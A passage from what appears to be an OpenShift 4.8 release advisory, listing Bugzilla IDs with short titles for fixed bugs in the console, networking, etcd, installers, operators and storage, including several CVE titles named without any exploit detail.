adm top reporting unknown status for Windows node 1920905 - Remove DNS lookup workaround from cluster-api-provider 1921106 - A11y Violation: button name(s) on Utilization Card on Cluster Dashboard 1921184 - kuryr-cni binds to wrong interface on machine with two interfaces 1921227 - Fix issues related to consuming new extensions in Console static plugins 1921264 - Bundle unpack jobs can hang indefinitely 1921267 - ResourceListDropdown not internationalized 1921321 - SR-IOV obliviously reboot the node 1921335 - ThanosSidecarUnhealthy 1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation 1921720 - test: openshift-tests.[sig-cli] oc observe works as expected [Suite:openshift/conformance/parallel] 1921763 - operator registry has high memory usage in 4.7... cleanup row closes 1921778 - Push to stage now failing with semver issues on old releases 1921780 - Search page not fully internationalized 1921781 - DefaultList component not internationalized 1921878 - [kuryr] Egress network policy with namespaceSelector in Kuryr behaves differently than in OVN-Kubernetes 1921885 - Server-side Dry-run with Validation Downloads Entire OpenAPI spec often 1921892 - MAO: controller runtime manager closes event recorder 1921894 - Backport Avoid node disruption when kube-apiserver-to-kubelet-signer is rotated 1921937 - During upgrade /etc/hostname becomes a directory, nodes are set with kubernetes.io/hostname=localhost label 1921953 - ClusterServiceVersion property inference does not infer package and version 1922063 - "Virtual Machine" should be "Templates" in template wizard 1922065 - Rootdisk size is default to 15GiB in customize wizard 1922235 - [build-watch] e2e-aws-upi - e2e-aws-upi container setup failing because of Python code version mismatch 1922264 - Restore snapshot as a new PVC: RWO/RWX access modes are not click-able if parent PVC is deleted 1922280 - [v2v] on the upstream release, In VM import wizard I see RHV but no oVirt 1922646 - Panic in authentication-operator invoking webhook authorization 1922648 - FailedCreatePodSandBox due to "failed to pin namespaces [uts]: [pinns:e]: /var/run/utsns exists and is not a directory: File exists" 1922764 - authentication operator is degraded due to number of kube-apiservers 1922992 - some button text on YAML sidebar are not translated 1922997 - [Migration]The SDN migration rollback failed. 1923038 - [OSP] Cloud Info is loaded twice 1923157 - Ingress traffic performance drop due to NodePort services 1923786 - RHV UPI fails with unhelpful message when ASSET_DIR is not set. 1923811 - Registry claims Available=True despite .status.readyReplicas == 0 while .spec.replicas == 2 1923847 - Error occurs when creating pods if configuring multiple key-only labels in default cluster-wide node selectors or project-wide node selectors 1923984 - Incorrect anti-affinity for UWM prometheus 1924020 - panic: runtime error: index out of range [0] with length 0 1924075 - kuryr-controller restart when enablePortPoolsPrepopulation = true 1924083 - "Activity" Pane of Persistent Storage tab shows events related to Noobaa too 1924140 - [OSP] Typo in OPENSHFIT_INSTALL_SKIP_PREFLIGHT_VALIDATIONS variable 1924171 - ovn-kube must handle single-stack to dual-stack migration 1924358 - metal UPI setup fails, no worker nodes 1924502 - Failed to start transient scope unit: Argument list too long / systemd[1]: Failed to set up mount unit: Invalid argument 1924536 - 'More about Insights' link points to support link 1924585 - "Edit Annotation" are not correctly translated in Chinese 1924586 - Control Plane status and Operators status are not fully internationalized 1924641 - [User Experience] The message "Missing storage class" needs to be displayed after user clicks Next and needs to be rephrased 1924663 - Insights operator should collect related pod logs when operator is degraded 1924701 - Cluster destroy fails when using byo with Kuryr 1924728 - Difficult to identify deployment issue if the destination disk is too small 1924729 - Create Storageclass for CephFS provisioner assumes incorrect default FSName in external mode (side-effect of fix for Bug 1878086) 1924747 - InventoryItem doesn't internationalize resource kind 1924788 - Not clear error message when there are no NADs available for the user 1924816 - Misleading error messages in ironic-conductor log 1924869 - selinux avc deny after installing OCP 4.7 1924916 - PVC reported as Uploading when it is actually cloning 1924917 - kuryr-controller in crash loop if IP is removed from secondary interfaces 1924953 - newly added 'excessive etcd leader changes' test case failing in serial job 1924968 - Monitoring list page filter options are not translated 1924983 - some components in utils directory not localized 1925017 - [UI] VM Details-> Network Interfaces, 'Name,' is displayed instead on 'Name' 1925061 - Prometheus backed by a PVC may start consuming a lot of RAM after 4.6 -> 4.7 upgrade due to series churn 1925083 - Some texts are not marked for translation on idp creation page. 1925087 - Add i18n support for the Secret page 1925148 - Shouldn't create the redundant imagestream when use oc new-app --name=testapp2 -i with exist imagestream 1925207 - VM from custom template - cloudinit disk is not added if creating the VM from custom template using customization wizard 1925216 - openshift installer fails immediately failed to fetch Install Config 1925236 - OpenShift Route targets every port of a multi-port service 1925245 - oc idle: Clusters upgrading with an idled workload do not have annotations on the workload's service 1925261 - Items marked as mandatory in KMS Provider form are not enforced 1925291 - Baremetal IPI - While deploying with IPv6 provision network with subnet other than /64 masters fail to PXE boot 1925343 - [ci] e2e-metal tests are not using reserved instances 1925493 - Enable snapshot e2e tests 1925586 - cluster-etcd-operator is leaking transports 1925614 - Error: InstallPlan.operators.coreos.com not found 1925698 - On GCP, load balancers report kube-apiserver fails its /readyz check 50% of the time, causing load balancer backend churn and disruptions to apiservers 1926029 - [RFE] Either disable save or give warning when no disks support snapshot 1926054 - Localvolume CR is created successfully, when the storageclass name defined in the localvolume exists. 1926072 - Close button (X) does not work in the new "Storage cluster exists" Warning alert message(introduced via fix for Bug 1867400) 1926082 - Insights operator should not go degraded during upgrade 1926106 - [ja_JP][zh_CN] Create Project, Delete Project and Delete PVC modal are not fully internationalized 1926115 - Texts in “Insights” popover on overview page are not marked for i18n 1926123 - Pseudo bug: revert "force cert rotation every couple days for development" in 4.7 1926126 - some kebab/action menu translation issues 1926131 - Add HPA page is not fully internationalized 1926146 - [sig-network-edge][Conformance][Area:Networking][Feature:Router] The HAProxy router should be able to connect to a service that is idled because a GET on the route will unidle it 1926154 - Create new pool with arbiter - wrong replica 1926278 - [oVirt] consume K8S 1.20 packages 1926279 - Pod ignores mtu setting from sriovNetworkNodePolicies in case of PF partitioning 1926285 - ignore pod not found status messages 1926289 - Accessibility: Modal content hidden from screen readers 1926310 - CannotRetrieveUpdates alerts on Critical severity 1926329 - [Assisted-4.7][Staging] monitoring stack in staging is being overloaded by the amount of metrics being exposed by assisted-installer pods and scraped by prometheus. 1926336 - Service details can overflow boxes at some screen widths 1926346 - move to go 1.15 and registry.ci.openshift.org 1926364 - Installer timeouts because proxy blocked connection to Ironic API running on bootstrap VM 1926465 - bootstrap kube-apiserver does not have --advertise-address set – was: [BM][IPI][DualStack] Installation fails cause Kubernetes service doesn't have IPv6 endpoints 1926484 - API server exits non-zero on 2 SIGTERM signals 1926547 - OpenShift installer not reporting IAM permission issue when removing the Shared Subnet Tag 1926579 - Setting .spec.policy is deprecated and will be removed eventually. Please use .spec.profile instead is being logged every 3 seconds in scheduler operator log 1926598 - Duplicate alert rules are displayed on console for thanos-querier api return wrong results 1926776 - "Template support" modal appears when select the RHEL6 common template 1926835 - [e2e][automation] prow gating use unsupported CDI version 1926843 - pipeline with finally tasks status is improper 1926867 - openshift-apiserver Available is False with 3 pods not ready for a while during upgrade 1926893 - When deploying the operator via OLM (after creating the respective catalogsource), the deployment "lost" the resources section. 1926903 - NTO may fail to disable stalld when relying on Tuned '[service]' plugin 1926931 - Inconsistent ovs-flow rule on one of the app node for egress node 1926943 - vsphere-problem-detector: Alerts in CI jobs 1926977 - [sig-devex][Feature:ImageEcosystem][Slow] openshift sample application repositories rails/nodejs 1927013 - Tables don't render properly at smaller screen widths 1927017 - CCO does not relinquish leadership when restarting for proxy CA change 1927042 - Empty static pod files on UPI deployments are confusing 1927047 - multiple external gateway pods will not work in ingress with IP fragmentation 1927068 - Workers fail to PXE boot when IPv6 provisionining network has subnet other than /64 1927075 - [e2e][automation] Fix pvc string in pvc.view 1927118 - OCP 4.7: NVIDIA GPU Operator DCGM metrics not displayed in OpenShift Console Monitoring Metrics page 1927244 - UPI installation with Kuryr timing out on bootstrap stage 1927263 - kubelet service takes around 43 secs to start container when started from stopped state 1927264 - FailedCreatePodSandBox due to multus inability to reach apiserver 1927310 - Performance: Console makes unnecessary requests for en-US messages on load 1927340 - Race condition in OperatorCondition reconcilation 1927366 - OVS configuration service unable to clone NetworkManager's connections in the overlay FS 1927391 - Fix flake in TestSyncPodsDeletesWhenSourcesAreReady 1927393 - 4.7 still points to 4.6 catalog images 1927397 - p&f: add auto update for priority & fairness bootstrap configuration objects 1927423 - Happy "Not Found" and no visible error messages on error-list page when /silences 504s 1927465 - Homepage dashboard content not internationalized 1927678 - Reboot interface defaults to softPowerOff so fencing is too slow 1927731 - /usr/lib/dracut/modules.d/30ignition/ignition --version sigsev 1927797 - 'Pod(s)' should be included in the pod donut label when a horizontal pod autoscaler is enabled 1927882 - Can't create cluster role binding from UI when a project is selected 1927895 - global RuntimeConfig is overwritten with merge result 1927898 - i18n Admin Notifier 1927902 - i18n Cluster Utilization dashboard duration 1927903 - "CannotRetrieveUpdates" - critical error in openshift web console 1927925 - Manually misspelled as Manualy 1927941 - StatusDescriptor detail item and Status component can cause runtime error when the status is an object or array 1927942 - etcd should use socket option (SO_REUSEADDR) instead of wait for port release on process restart 1927944 - cluster version operator cycles terminating state waiting for leader election 1927993 - Documentation Links in OKD Web Console are not Working 1928008 - Incorrect behavior when we click back button after viewing the node details in Internal-attached mode 1928045 - N+1 scaling Info message says "single zone" even if the nodes are spread across 2 or 0 zones 1928147 - Domain search set in the required domains in Option 119 of DHCP Server is ignored by RHCOS on RHV 1928157 - 4.7 CNO claims to be done upgrading before it even starts 1928164 - Traffic to outside the cluster redirected when OVN is used and NodePort service is configured 1928297 - HAProxy fails with 500 on some requests 1928473 - NetworkManager overlay FS not being created on None platform 1928512 - sap license management logs gatherer 1928537 - Cannot IPI with tang/tpm disk encryption 1928640 - Definite error message when using StorageClass based on azure-file / Premium_LRS 1928658 - Update plugins and Jenkins version to prepare openshift-sync-plugin 1.0.46 release 1928850 - Unable to pull images due to limited quota on Docker Hub 1928851 - manually creating NetNamespaces will break things and this is not obvious 1928867 - golden images - DV should not be created with WaitForFirstConsumer 1928869 - Remove css required to fix search bug in console caused by pf issue in 2021.1 1928875 - Update translations 1928893 - Memory Pressure Drop Down Info is stating "Disk" capacity is low instead of memory 1928931 - DNSRecord CRD is using deprecated v1beta1 API 1928937 - CVE-2021-23337 nodejs-lodash: command injection via template 1928954 - CVE-2020-28500 nodejs-lodash: ReDoS via the toNumber, trim and trimEnd functions 1929052 - Add new Jenkins agent maven dir for 3.6 1929056 - kube-apiserver-availability.rules are failing evaluation 1929110 - LoadBalancer service check test fails during vsphere upgrade 1929136 - openshift isn't able to mount nfs manila shares to pods 1929175 - LocalVolumeSet: PV is created on disk belonging to other provisioner 1929243 - Namespace column missing in Nodes Node Details / pods tab 1929277 - Monitoring workloads using too high a priorityclass 1929281 - Update Tech Preview badge to transparent border color when upgrading to PatternFly v4.87.1 1929314 - ovn-kubernetes endpoint slice controller doesn't run on CI jobs 1929359 - etcd-quorum-guard uses origin-cli [4.8] 1929577 - Edit Application action overwrites Deployment envFrom values on save 1929654 - Registry for Azure uses legacy V1 StorageAccount 1929693 - Pod stuck at "ContainerCreating" status 1929733 - oVirt CSI driver operator is constantly restarting 1929769 - Getting 404 after switching user perspective in another tab and reload Project details 1929803 - Pipelines shown in edit flow for Workloads created via ContainerImage flow 1929824 - fix alerting on volume name check for vsphere 1929917 - Bare-metal operator is firing for ClusterOperatorDown for 15m during 4.6 to 4.7 upgrade 1929944 - The etcdInsufficientMembers alert fires incorrectly when any instance is down and not when quorum is lost 1930007 - filter dropdown item filter and resource list dropdown item filter doesn't support multi selection 1930015 - OS list is overlapped by buttons in template wizard 1930064 - Web console crashes during VM creation from template when no storage classes are defined 1930220 - Cinder CSI driver is not able to mount volumes under heavier load 1930240 - Generated clouds.yaml incomplete when provisioning network is disabled 1930248 - After creating a remediation flow and rebooting a worker there is no access to the openshift-web-console 1930268 - intel vfio devices are not expose as resources 1930356 - Darwin binary missing from mirror.openshift.com 1930393 - Gather info about unhealthy SAP pods 1930546 - Monitoring-dashboard-workload keep loading when user with cluster-role cluster-monitoring-view login develoer console 1930570 - Jenkins templates are displayed in Developer Catalog twice 1930620 - the logLevel field in containerruntimeconfig can't be set to "trace" 1930631 - Image local-storage-mustgather in the doc does not come from product registry 1930893 - Backport upstream patch 98956 for pod terminations 1931005 - Related objects page doesn't show the object when its name is empty 1931103 - remove periodic log within kubelet 1931115 - Azure cluster install fails with worker type workers Standard_D4_v2 1931215 - [RFE] Cluster-api-provider-ovirt should handle affinity groups 1931217 - [RFE] Installer should create RHV Affinity group for OCP cluster VMS 1931467 - Kubelet consuming a large amount of CPU and memory and node becoming unhealthy 1931505 - [IPI baremetal] Two nodes hold the VIP post remove and start of the Keepalived container 1931522 - Fresh UPI install on BM with bonding using OVN Kubernetes fails 1931529 - SNO: mentioning of 4 nodes in error message - Cluster network CIDR prefix 24 does not contain enough addresses for 4 hosts each one with 25 prefix (128 addresses) 1931629 - Conversational Hub Fails due to ImagePullBackOff 1931637 - Kubeturbo Operator fails due to ImagePullBackOff 1931652 - [single-node] etcd: discover-etcd-initial-cluster graceful termination race. 1931658 - [single-node] cluster-etcd-operator: cluster never pivots from bootstrapIP endpoint 1931674 - [Kuryr] Enforce nodes MTU for the Namespaces and Pods 1931852 - Ignition HTTP GET is failing, because DHCP IPv4 config is failing silently 1931883 - Fail to install Volume Expander Operator due to CrashLookBackOff 1931949 - Red Hat Integration Camel-K Operator keeps stuck in Pending state 1931974 - Operators cannot access kubeapi endpoint on OVNKubernetes on ipv6 1931997 - network-check-target causes upgrade to fail from 4.6.18 to 4.7 1932001 - Only one of multiple subscriptions to the same package is honored 1932097 - Apiserver liveness probe is marking it as unhealthy during normal shutdown 1932105 - machine-config ClusterOperator claims level while control-plane still updating 1932133 - AWS EBS CSI Driver doesn’t support “csi.storage.k8s.io/fsTyps” parameter 1932135 - When “iopsPerGB” parameter is not set, event for AWS EBS CSI Driver provisioning is not clear 1932152 - When “iopsPerGB” parameter is set to a wrong number, events for AWS EBS CSI Driver provisioning are not clear 1932154 - [AWS ] machine stuck in provisioned phase , no warnings or errors 1932182 - catalog operator causing CPU spikes and bad etcd performance 1932229 - Can’t find kubelet metrics for aws ebs csi volumes 1932281 - [Assisted-4.7][UI] Unable to change upgrade channel once upgrades were discovered 1932323 - CVE-2021-26540 sanitize-html: improper validation of hostnames set by the "allowedIframeHostnames" option can lead to bypass hostname whitelist for iframe element 1932324 - CRIO fails to create a Pod in sandbox stage - starting container process caused: process_linux.go:472: container init caused: Running hook #0:: error running hook: exit status 255, stdout: , stderr: \"\n" 1932362 - CVE-2021-26539 sanitize-html: improper handling of internationalized domain name (IDN) can lead to bypass hostname whitelist validation 1932401 - Cluster Ingress Operator degrades if external LB redirects http to https because of new "canary" route 1932453 - Update Japanese timestamp format 1932472 - Edit Form/YAML switchers cause weird collapsing/code-folding issue 1932487 - [OKD] origin-branding manifest is missing cluster profile annotations 1932502 - Setting MTU for a bond interface using Kernel arguments is not working 1932618 - Alerts during a test run should fail the test job, but were not 1932624 - ClusterMonitoringOperatorReconciliationErrors is pending at the end of an upgrade and probably should not be 1932626 - During a 4.8 GCP upgrade OLM fires an alert indicating the operator is unhealthy 1932673 - Virtual machine template provided by red hat should not be editable. The UI allows to edit and then reverse the change after it was made 1932789 - Proxy with port is unable to be validated if it overlaps with service/cluster network 1932799 - During a hive driven baremetal installation the process does not go beyond 80% in the bootstrap VM 1932805 - e2e: test OAuth API connections in the tests by that name 1932816 - No new local storage operator bundle image is built 1932834 - enforce the use of hashed access/authorize tokens 1933101 - Can not upgrade a Helm Chart that uses a library chart in the OpenShift dev console 1933102 - Canary daemonset uses default node selector 1933114 - [sig-network-edge][Conformance][Area:Networking][Feature:Router] The HAProxy router should be able to connect to a service that is idled because a GET on the route will unidle it [Suite:openshift/conformance/parallel/minimal] 1933159 - multus DaemonSets should use maxUnavailable: 33% 1933173 - openshift-sdn/sdn DaemonSet should use maxUnavailable: 10% 1933174 - openshift-sdn/ovs DaemonSet should use maxUnavailable: 10% 1933179 - network-check-target DaemonSet should use maxUnavailable: 10% 1933180 - openshift-image-registry/node-ca DaemonSet should use maxUnavailable: 10% 1933184 - openshift-cluster-csi-drivers DaemonSets should use maxUnavailable: 10% 1933263 - user manifest with nodeport services causes bootstrap to block 1933269 - Cluster unstable replacing an unhealthy etcd member 1933284 - Samples in CRD creation are ordered arbitarly 1933414 - Machines are created with unexpected name for Ports 1933599 - bump k8s.io/apiserver to 1.20.3 1933630 - [Local Volume] Provision disk failed when disk label has unsupported value like ":" 1933664 - Getting Forbidden for image in a container template when creating a sample app 1933708 - Grafana is not displaying deployment config resources in dashboard Default /Kubernetes / Compute Resources / Namespace (Workloads) 1933711 - EgressDNS: Keep short lived records at most 30s 1933730 - [AI-UI-Wizard] Toggling "Use extra disks for local storage" checkbox highlights the "Next" button to move forward but grays out once clicked 1933761 - Cluster DNS service caps TTLs too low and thus evicts from its cache too aggressively 1933772 - MCD Crash Loop Backoff 1933805 - TargetDown alert fires during upgrades because of normal upgrade behavior 1933857 - Details page can throw an uncaught exception if kindObj prop is undefined 1933880 - Kuryr-Controller crashes when it's missing the status object 1934021 - High RAM usage on machine api termination node system oom 1934071 - etcd consuming high amount of memory and CPU after upgrade to 4.6.17 1934080 - Both old and new Clusterlogging CSVs stuck in Pending during upgrade 1934085 - Scheduling conformance tests failing in a single node cluster 1934107 - cluster-authentication-operator builds URL incorrectly for IPv6 1934112 - Add memory and uptime metadata to IO archive 1934113 - mcd panic when there's not enough free disk space 1934123 - [OSP] First public endpoint is used to fetch ignition config from Glance URL (with multiple endpoints) on OSP 1934163 - Thanos Querier restarting and gettin alert ThanosQueryHttpRequestQueryRangeErrorRateHigh 1934174 - rootfs too small when enabling NBDE 1934176 - Machine Config Operator degrades during cluster update with failed to convert Ignition config spec v2 to v3 1934177 - knative-camel-operator CreateContainerError "container_linux.go:366: starting container process caused: chdir to cwd (\"/home/nonroot\") set in config.json failed: permission denied" 1934216 - machineset-controller stuck in CrashLoopBackOff after upgrade to 4.7.0 1934229 - List page text filter has input lag 1934397 - Extend OLM operator gatherer to include Operator/ClusterServiceVersion conditions 1934400 - [ocp_4][4.6][apiserver-auth] OAuth API servers are not ready - PreconditionNotReady 1934516 - Setup different priority classes for prometheus-k8s and prometheus-user-workload pods 1934556 - OCP-Metal images 1934557 - RHCOS boot image bump for LUKS fixes 1934643 - Need BFD failover capability on ECMP routes 1934711 - openshift-ovn-kubernetes ovnkube-node DaemonSet should use maxUnavailable: 10% 1934773 - Canary client should perform canary probes explicitly over HTTPS (rather than redirect from HTTP) 1934905 - CoreDNS's "errors" plugin is not enabled for custom upstream resolvers 1935058 - Can’t finish install sts clusters on aws government region 1935102 - Error: specifying a root certificates file with the insecure flag is not allowed during oc login 1935155 - IGMP/MLD packets being dropped 1935157 - [e2e][automation] environment tests broken 1935165 - OCP 4.6 Build fails when filename contains an umlaut 1935176 - Missing an indication whether the deployed setup is SNO. 1935269 - Topology operator group shows child Jobs. Not shown in details view's resources. 1935419 - Failed to scale worker using virtualmedia on Dell R640 1935528 - [AWS][Proxy] ingress reports degrade with CanaryChecksSucceeding=False in the cluster with proxy setting 1935539 - Openshift-apiserver CO unavailable during cluster upgrade from 4.6 to 4.7 1935541 - console operator panics in DefaultDeployment with nil cm 1935582 - prometheus liveness probes cause issues while replaying WAL 1935604 - high CPU usage fails ingress controller 1935667 - pipelinerun status icon rendering issue 1935706 - test: Detect when the master pool is still updating after upgrade 1935732 - Update Jenkins agent maven directory to be version agnostic [ART ocp build data] 1935814 - Pod and Node lists eventually have incorrect row heights when additional columns have long text 1935909 - New CSV using ServiceAccount named "default" stuck in Pending during upgrade 1936022 - DNS operator performs spurious updates in response to API's defaulting of daemonset's terminationGracePeriod and service's clusterIPs 1936030 - Ingress operator performs spurious updates in response to API's defaulting of NodePort service's clusterIPs field 1936223 - The IPI installer has a typo. It is missing the word "the" in "the Engine". 1936336 - Updating multus-cni builder & base images to be consistent with ART 4.8 (closed) 1936342 - kuryr-controller restarting after 3 days cluster running - pools without members 1936443 - Hive based OCP IPI baremetal installation fails to connect to API VIP port 22623 1936488 - [sig-instrumentation][Late] Alerts shouldn't report any alerts in firing state apart from Watchdog and AlertmanagerReceiversNotConfigured: Prometheus query error 1936515 - sdn-controller is missing some health checks 1936534 - When creating a worker with a used mac-address stuck on registering 1936585 - configure alerts if the catalogsources are missing 1936620 - OLM checkbox descriptor renders switch instead of checkbox 1936721 - network-metrics-deamon not associated with a priorityClassName 1936771 - [aws ebs csi driver] The event for Pod consuming a readonly PVC is not clear 1936785 - Configmap gatherer doesn't include namespace name (in the archive path) in case of a configmap with binary data 1936788 - RBD RWX PVC creation with Filesystem volume mode selection is creating RWX PVC with Block volume mode instead of disabling Filesystem volume mode selection 1936798 - Authentication log gatherer shouldn't scan all the pod logs in the openshift-authentication namespace 1936801 - Support ServiceBinding 0.5.0+ 1936854 - Incorrect imagestream is shown as selected in knative service container image edit flow 1936857 - e2e-ovirt-ipi-install-install is permafailing on 4.5 nightlies 1936859 - ovirt 4.4 -> 4.5 upgrade jobs are permafailing 1936867 - Periodic vsphere IPI install is broken - missing pip 1936871 - [Cinder CSI] Topology aware provisioning doesn't work when Nova and Cinder AZs are different 1936904 - Wrong output YAML when syncing groups without --confirm 1936983 - Topology view - vm details screen isntt stop loading 1937005 - when kuryr quotas are unlimited, we should not sent alerts 1937018 - FilterToolbar component does not handle 'null' value for 'rowFilters' prop 1937020 - Release new from image stream chooses incorrect ID based on status 1937077 - Blank White page on Topology 1937102 - Pod Containers Page Not Translated 1937122 - CAPBM changes to support flexible reboot modes 1937145 - [Local storage] PV provisioned by localvolumeset stays in "Released" status after the pod/pvc deleted 1937167 - [sig-arch] Managed cluster should have no crashlooping pods in core namespaces over four minutes 1937244 - [Local Storage] The model name of aws EBS doesn't be extracted well 1937299 - pod.spec.volumes.awsElasticBlockStore.partition is not respected on NVMe volumes 1937452 - cluster-network-operator CI linting fails in master branch 1937459 - Wrong Subnet retrieved for Service without Selector 1937460 - [CI] Network quota pre-flight checks are failing the installation 1937464 - openstack cloud credentials are not getting configured with correct user_domain_name across the cluster 1937466 - KubeClientCertificateExpiration alert is confusing, without explanation in the documentation 1937496 - Metrics viewer in OCP Console is missing date in a timestamp for selected datapoint 1937535 - Not all image pulls within OpenShift builds retry 1937594 - multiple pods in ContainerCreating state after migration from OpenshiftSDN to OVNKubernetes 1937627 - Bump DEFAULT_DOC_URL for 4.8 1937628 - Bump upgrade channels for 4.8 1937658 - Description for storage class encryption during storagecluster creation needs to be updated 1937666 - Mouseover on headline 1937683 - Wrong icon classification of output in buildConfig when the destination is a DockerImage 1937693 - ironic image "/" cluttered with files 1937694 - [oVirt] split ovirt providerIDReconciler logic into NodeController and ProviderIDController 1937717 - If browser default font size is 20, the layout of template screen breaks 1937722 - OCP 4.8 vuln due to BZ 1936445 1937929 - Operand page shows a 404:Not Found error for OpenShift GitOps Operator 1937941 - [RFE]fix wording for favorite templates 1937972 - Router HAProxy config file template is slow to render due to repetitive regex compilations 1938131 - [AWS] Missing iam:ListAttachedRolePolicies permission in permissions.go 1938321 - Cannot view PackageManifest objects in YAML on 'Home > Search' page nor 'CatalogSource details > Operators tab' 1938465 - thanos-querier should set a CPU request on the thanos-query container 1938466 - packageserver deployment sets neither CPU or memory request on the packageserver container 1938467 - The default cluster-autoscaler should get default cpu and memory requests if user omits them 1938468 - kube-scheduler-operator has a container without a CPU request 1938492 - Marketplace extract container does not request CPU or memory 1938493 - machine-api-operator declares restrictive cpu and memory limits where it should not 1938636 - Can't set the loglevel of the container: cluster-policy-controller and kube-controller-manager-recovery-controller 1938903 - Time range on dashboard page will be empty after drog and drop mouse in the graph 1938920 - ovnkube-master/ovs-node DaemonSets should use maxUnavailable: 10% 1938947 - Update blocked from 4.6 to 4.7 when using spot/preemptible instances 1938949 - [VPA] Updater failed to trigger evictions due to "vpa-admission-controller" not found 1939054 - machine healthcheck kills aws spot instance before generated 1939060 - CNO: nodes and masters are upgrading simultaneously 1939069 - Add source to vm template silently failed when no storage class is defined in the cluster 1939103 - CVE-2021-28092 nodejs-is-svg: ReDoS via malicious string 1939168 - Builds failing for OCP 3.11 since PR#25 was merged 1939226 - kube-apiserver readiness probe appears to be hitting /healthz, not /readyz 1939227 - kube-apiserver liveness probe appears to be hitting /healthz, not /livez 1939232 - CI tests using openshift/hello-world broken by Ruby Version Update 1939270 - fix co upgradeableFalse status and reason 1939294 - OLM may not delete pods with grace period zero (force delete) 1939412 - missed labels for thanos-ruler pods 1939485 - CVE-2021-20291 containers/storage: DoS via malicious image 1939547 - Include container="POD" in resource queries 1939555 - VSphereProblemDetectorControllerDegraded: context canceled during upgrade to 4.8.0 1939573 - after entering valid git repo url on add flow page, throwing warning message instead Validated 1939580 - Authentication operator is degraded during 4.8 to 4.8 upgrade and normal 4.8 e2e runs 1939606 - Attempting to put a host into maintenance mode warns about Ceph cluster health, but no storage cluster problems are apparent 1939661 - support new AWS region ap-northeast-3 1939726 - clusteroperator/network should not change condition/Degraded during normal serial test execution 1939731 - Image registry operator reports unavailable during normal serial run 1939734 - Node Fanout Causes Excessive WATCH Secret Calls, Taking Down Clusters 1939740 - dual stack nodes with OVN single ipv6 fails on bootstrap phase 1939752 - ovnkube-master sbdb container does not set requests on cpu or memory 1939753 - Delete HCO is stucking if there is still VM in the cluster 1939815 - Change the Warning Alert for Encrypted PVs in Create StorageClass(provisioner:RBD) page 1939853 - [DOC] Creating manifests API should not allow folder in the "file_name" 1939865 - GCP PD CSI driver does not have CSIDriver instance 1939869 - [e2e][automation] Add annotations to datavolume for HPP 1939873 - Unlimited number of characters accepted for base domain name 1939943 - cluster-kube-apiserver-operator check-endpoints observed a panic: runtime error: invalid memory address or nil pointer dereference 1940030 - cluster-resource-override: fix spelling mistake for run-level match expression in webhook configuration 1940057 - Openshift builds should use a wach instead of polling when checking for pod status 1940142 - 4.6->4.7 updates stick on OpenStackCinderCSIDriverOperatorCR_OpenStackCinderDriverControllerServiceController_Deploying 1940159 - [OSP] cluster destruction fails to remove router in BYON (with provider network) with Kuryr as primary network 1940206 - Selector and VolumeTableRows not i18ned 1940207 - 4.7->4.6 rollbacks stuck on prometheusrules admission webhook "no route to host" 1940314 - Failed to get type for Dashboard Kubernetes / Compute Resources / Namespace (Workloads) 1940318 - No data under 'Current Bandwidth' for Dashboard 'Kubernetes / Networking / Pod' 1940322 - Split of dashbard is wrong, many Network parts 1940337 - rhos-ipi installer fails with not clear message when openstack tenant doesn't have flavors needed for compute machines 1940361 - [e2e][automation] Fix vm action tests with storageclass HPP 1940432 - Gather datahubs.installers.datahub.sap.com resources from SAP clusters 1940488 - After fix for CVE-2021-3344, Builds do not mount node entitlement keys 1940498 - pods may fail to add logical port due to lr-nat-del/lr-nat-add error messages 1940499 - hybrid-overlay not logging properly before exiting due to an error 1940518 - Components in bare metal components lack resource requests 1940613 - CVE-2021-27292 nodejs-ua-parser-js: ReDoS via malicious User-Agent header 1940704 - prjquota is dropped from rootflags if rootfs is reprovisioned 1940755 - [Web-console][Local Storage] LocalVolumeSet could not be created from web-console without detail error info 1940865 - Add BareMetalPlatformType into e2e upgrade service unsupported list 1940876 - Components in ovirt components lack resource requests 1940889 - Installation failures in OpenStack release jobs 1940933 - [sig-arch] Check if alerts are firing during or after upgrade success: AggregatedAPIDown on v1beta1.metrics.k8s.io 1940939 - Wrong Openshift node IP as kubelet setting VIP as node IP 1940940 - csi-snapshot-controller goes unavailable when machines are added removed to cluster 1940950 - vsphere: client/bootstrap CSR double create 1940972 - vsphere: [4.6] CSR approval delayed for unknown reason 1941000 - cinder storageclass creates persistent volumes with wrong label failure-domain.beta.kubernetes.io/zone in multi availability zones architecture on OSP 16. 1941334 - [RFE] Cluster-api-provider-ovirt should handle auto pinning policy 1941342 - Add kata-osbuilder-generate.service as part of the default presets 1941456 - Multiple pods stuck in ContainerCreating status with the message "failed to create container for [kubepods burstable podxxx] : dbus: connection closed by user" being seen in the journal log 1941526 - controller-manager-operator: Observed a panic: nil pointer dereference 1941592 - HAProxyDown not Firing 1941606 - [assisted operator] Assisted Installer Operator CSV related images should be digests for icsp 1941625 - Developer -> Topology - i18n misses 1941635 - Developer -> Monitoring - i18n misses 1941636 - BM worker nodes deployment with virtual media failed while trying to clean raid 1941645 - Developer -> Builds - i18n misses 1941655 - Developer -> Pipelines - i18n misses 1941667 - Developer -> Project - i18n misses 1941669 - Developer -> ConfigMaps - i18n misses 1941759 - Errored pre-flight checks should not prevent install 1941798 - Some details pages don't have internationalized ResourceKind labels 1941801 - Many filter toolbar dropdowns haven't been internationalized 1941815 - From the web console the terminal can no longer connect after using leaving and returning to the terminal view 1941859 - [assisted operator] assisted pod deploy first time in error state 1941901 - Toleration merge logic does not account for multiple entries with the same key 1941915 - No validation against template name in boot source customization 1941936 - when setting parameters in containerRuntimeConfig, it will show incorrect information on its description 1941980 - cluster-kube-descheduler operator is broken when upgraded from 4.7 to 4.8 1941990 - Pipeline metrics endpoint changed in osp-1.4 1941995 - fix backwards incompatible trigger api changes in osp1.4 1942086 - Administrator -> Home - i18n misses 1942117 - Administrator -> Workloads - i18n misses 1942125 - Administrator -> Serverless - i18n misses 1942193 - Operand creation form - broken/cutoff blue line on the Accordion component (fieldGroup) 1942207 - [vsphere] hostname are changed when upgrading from 4.6 to 4.7.x causing upgrades to fail 1942271 - Insights operator doesn't gather pod information from openshift-cluster-version 1942375 - CRI-O failing with error "reserving ctr name" 1942395 - The status is always "Updating" on dc detail page after deployment has failed. 1942521 - [Assisted-4.7] [Staging][OCS] Minimum memory for selected role is failing although minimum OCP requirement satisfied 1942522 - Resolution fails to sort channel if inner entry does not satisfy predicate 1942536 - Corrupted image preventing containers from starting 1942548 - Administrator -> Networking - i18n misses 1942553 - CVE-2021-22133 go.elastic.co/apm: leaks sensitive HTTP headers during panic 1942555 - Network policies in ovn-kubernetes don't support external traffic from router when the endpoint publishing strategy is HostNetwork 1942557 - Query is reporting "no 